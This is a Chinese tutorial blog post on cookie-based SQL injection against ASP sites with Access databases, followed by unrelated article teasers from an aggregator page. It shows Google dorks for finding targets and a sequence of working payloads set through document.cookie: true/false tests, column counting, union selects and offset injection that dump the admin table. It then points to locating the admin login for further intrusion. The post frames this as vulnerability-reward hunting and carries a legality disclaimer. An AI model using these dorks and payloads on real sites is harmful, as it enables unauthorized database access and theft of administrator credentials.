SRC实战-cookie注入漏洞

news2024/11/18 3:41:52

目录

谷歌语法-信息收集

cookie注入

实战演示

信息收集

SQL注入判断

查找字段数

爆破表名

输出结果

总结


本文由掌控安全学院 - 小博 投稿

谷歌语法-信息收集

1.查找带有ID传参的网站(可以查找sql注入漏洞)
inurl:asp id=xx
2.查找网站后台(多数有登陆框,可以查找弱口令,暴力破解等漏洞)
site:http://xxxx.com “admin”
site:http://xx.com intext:管理
site:http://xx.com inurl:login
site:http://xx.com intitle:后台
3.查看上传漏洞
site:http://xx.com inurl:file
site:http://xx.com inurl:load
4.查找敏感文件
filetype:mdb|doc|xlsx|pdf

cookie注入

1、cookie注入:
cookie相当于访问者的身份证,后端php代码中的$_REQUEST[]来获取你的cookie,网站会获取Cookie传参然后和原有的SQL语句拼接再传入数据库,传入了数据库这样我们就有机可乘了,我们可以修改cookie值进入数据库中进行sql注入
Cookie注入在ASP网站中和低版本php中才会有,ASP常用的数据库是Accsess。

2、Access数据库:
access有强大的数据处理、统计分析能力,利用access的查询功能,可以方便地进行各类汇总、平均等统计,并且access数据库无库名。
access数据库在查询语句时和mysql不同,access比较严谨
所以要select 字段 from 表名
函数exists(select*from 表名)可以验证这个表名是否存在,这个表名还可以用burp来爆破

3、怎样修改cookie:
用burp抓包改
用插件改(需要自己编码一下)
阅览器自带js进行设置(document.cookie=’id=’+escape(“代码”))

实战演示

信息收集

通过谷歌语法查找带有asp文件下的id传参,发现有很多带有id=1传参的网站,可以挨个试一试,id传参数可以任意修改。
发现一家id=104的网站

SQL注入判断

废话不多说直接判断是否存在sql注入,and 1=2发现网站报错,但是1=1页面显示正常,说明存在sql注入

 
  1. document.cookie='id='+escape("104 and 1=1")

  2. document.cookie='id='+escape("104 and 1=2")

查找字段数

直接查找一下字段数,发现字段数为10

1 
 document.cookie='id='+escape("104 order by 10")
 
爆破表名

因为这是一个ACCESS数据库,没有库名,所以我们可以使用burp爆破出表名,这里就不给大家展示了。 

1.  document.cookie='id='+escape("104 union select 1,2,3,4,5,6,7,8,9,10 from admin") 


                          
发现存在admin表,且回显点是2和5
输出结果

使用偏移注入查看admin表的字段数并且把表里的内容显示出来

1. document.cookie='id='+escape("104 union select 1,2,3,4,5,6,7,admin.* from admin")2. document.cookie='id='+escape("104 union select 1,2,3,admin.*,7,8,9,10 from admin")

总结

1.谷歌语法找到注入点
2.判断注入是否存在
3.通过cookie绕过注入
4.爆破表名
5.偏移注入查找表的字段数
6.最后可以通过爆破目录查找登陆框,进入后台进一步渗透拿权限
第一次投稿,觉得这次实战记录很适合新手小白挖SRC,希望多多支持!

申明:本文所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法                                                  

                                       没看够~?欢迎关注!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1076661.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

xshell安装完成在windows不能打开

文章目录 问题描述问题排查解决第一步第二步 问题描述 安装打开xshell的时候总是点击没有任何的反应,重启电脑后再次点击xshell也没有任何的响应。只有在重装软件后才能正常打开。 问题排查 点击打开xshell7的时候总是报如下错 在这里能看到具体的描述&#xff…

【运维笔记】Docker 部署Kibana-7.4.0(在线Docker版)

Docker 部署Kibana-7.4.0(在线Docker版) 一、准备工作: Centos 7.5 安装 Docker-24.0.6 详细步骤(避坑版): https://blog.csdn.net/seesun2012/article/details/133674191注意1:本文的命令使用…

【SpringMVC篇】详解SpringMVC入门案例

🎊专栏【SpringMVC】 🍔喜欢的诗句:天行健,君子以自强不息。 🎆音乐分享【如愿】 🎄欢迎并且感谢大家指出小吉的问题🥰 文章目录 🎍SpringMVC简介⭐优点 🌺SpringMVC入门…

SpringBoot整合Jaspty数据库密码加密

1.application.yml配置 2.利用jaspty工具类将数据库密码明文加密 /*** 明文加密*/public static String encrypt(String str,String pwd) {BasicTextEncryptor basicTextEncryptor new BasicTextEncryptor();basicTextEncryptor.setPassword(pwd);String ciphertext basicTe…

京东代码规范与解决图片底部空白缝隙问题

解决图片底端默认空白缝隙问题 给图片加边框,因为图片和文字底线对齐故会留出空白的部分 解决 :给图片vertical-align: middle; 块级元素独占一行 解决2:给图片转换成块级元素,防止其机械的对齐 方框中的文字如果显示不开自动…

技术篇——废水除铊、除铊吸附树脂技术

铊是一种有毒有害的重金属元素,对人体的神经、心血管、消化系统等都有较大的危害。因此,对铊污染的废水进行治理是非常必要的。 虽然铊的应用范围比较广泛,但同时也是一种剧毒的重金属,与砷、汞等重金属相比,铊污染较…

二维码解码文字或者链接怎么做?二维码分解内容的方法

当需要提取出二维码中的文字或者链接时该如何处理呢?一般想要获取二维码中的文本/链接内容可以使用二维码解码(二维码解码器在线-二维码图片解码-二维码转短链接生成器-机智熊二维码)工具来处理,只需要上传二维码图片就可以自动识…

购买新风机那些注意事项?

在购买新风机时,需要注意以下几个关键因素: 需求分析:首先要明确自己的需求。确定你希望新风机覆盖的面积和使用场所,以及你对新风机功能和性能的要求。这有助于筛选出适合的型号和规格。 新风量:新风量是衡量新风机性…

手写模拟SpringBoot核心流程

通过手写模拟实现一个Spring Boot,让大家能以非常简单的方式就能知道Spring Boot大概是如何工作的。 依赖 建一个工程,两个Module: 1.springboot模块,表示springboot框架的源码实现 2.user包,表示用户业务系统,用来写…

iview表格 异步修改列数据卡顿 滚动条失效

使用表格row-key属性 将row-key属性设置为true <Table ref"table" border :row-key"true" :columns"tableColumns" :loading"loading":data"tableData"></Table>

web基础及http协议

web基础 全称 world wide web 全球广域网也就是万维网 web1.0 只能看 web2.0 页面交互&#xff1a;静态页面和动态页面 静态页面url&#xff1a;文本文件&#xff0c;可以修改&#xff0c;一般以html .htm保存的文本文件。网站的基础。静态页面和后台数据库没有任何交互不包含…

接口自动化测试方案模版。希望可以帮到你

XXX接口自动化测试方案 1、引言 1.1 文档版本 版本 作者 审批 备注 V1.0 XXXX 创建测试方案文档 1.2 项目情况 项目名称 XXX 项目版本 V1.0 项目经理 XX 测试人员 XXXXX&#xff0c;XXX 所属部门 XX 备注 1.3 文档目的 本文档主要用于指导XXX-Y…

匠心传承,长期主义 | 竹云董事长董宁受邀出席大湾区品牌新消费论坛

10月8日&#xff0c;大湾区品牌新消费论坛在深圳落下帷幕&#xff0c;此次论坛以“酿造美好生活”为主题&#xff0c;由广东省粤港澳大湾区产业协同发展联合会、张支云酒业集团主办&#xff0c;香港大湾区工商业联合会、深圳市老字号协会协办。 深圳市人大常委会教科文卫工委主…

红队专题-REVERSE二进制逆向反编译

红队专题 招募六边形战士队员IDA pro安装python2加入环境变量py2安装pip安装IDA 7.0 proIDAPython: importing "site" failed. 招募六边形战士队员 一起学习 代码审计、安全开发、web攻防、逆向等。。。 私信联系 IDA pro 安装python2 python-2.7.3.msi 加入环…

点云曲面重建

曲面重建技术在逆向工程、数据可视化、机器视觉、虚拟现实、医疗技术等领域中得到了广泛的应用 。 例如&#xff0c;在汽车、航空等工业领域中&#xff0c;复杂外形产品的设计仍需要根据手工模型&#xff0c;采用逆向工程的手段建立产品的数字化模型&#xff0c;根据测量数据建…

时代风口中的Web3.0基建平台,重新定义Web3.0!

近年来&#xff0c;Web3.0概念的广泛兴起&#xff0c;给加密行业带来了崭新的叙事方式&#xff0c;同时也为加密行业提供了更加具有想象力的应用场景与商业空间&#xff0c;并让越来越多的行业从业者们意识到只有更大众化的市场共性需求才能推动加密市场的持续繁荣。当前围绕这…

软件测试/测试开发丨App自动化—高级控件交互方法

点此获取更多相关资料 本文为霍格沃兹测试开发学社学员学习笔记分享 原文链接&#xff1a;https://ceshiren.com/t/topic/27687 一、Actions Actions执行一系列或多个键盘和指针&#xff08;触摸、鼠标、触控笔&#xff09;操作链w3c 二、用法 定义 ActionChains 实例定义输…

种草文案怎么写吸引人?纯干货

种草文案的最终目的是激发用户的购买欲望&#xff0c;使他们产生购买行为。为了实现这一目标&#xff0c;种草文案应当抓住用户的痛点&#xff0c;突出产品的优势&#xff0c;让用户感受到产品的实用价值。此外&#xff0c;种草文案还应注重情感诉求&#xff0c;通过生动的故事…

Bean的作用域和生命周期(Bean是线程安全的吗?Spring如何在并发情况下获取不完整的Bean...)

Bean 注解是 Spring 框架中的一个注解&#xff0c;用于告诉 Spring 容器需要将被注解修饰的方法的返回值注册为一个 Bean。通常情况下&#xff0c;Spring 容器会自动扫描并创建带有 Component 或其他类似注解的类&#xff0c;并将这些类的实例注册为 Bean。但对于某些特殊情况&…

iPhone手机上使用的定时提醒APP是哪个

在日常喧闹的生活和工作中&#xff0c;琐碎的任务会像喷泉一样突涌而至&#xff0c;如不及时规划&#xff0c;我们将陷入手足无措的境地。而想要让各项工作任务按时完成&#xff0c;我们可以借助一些比较好用的时间提醒软件来督促各项任务。 就拿常用的iPhone手机来讲&#xf…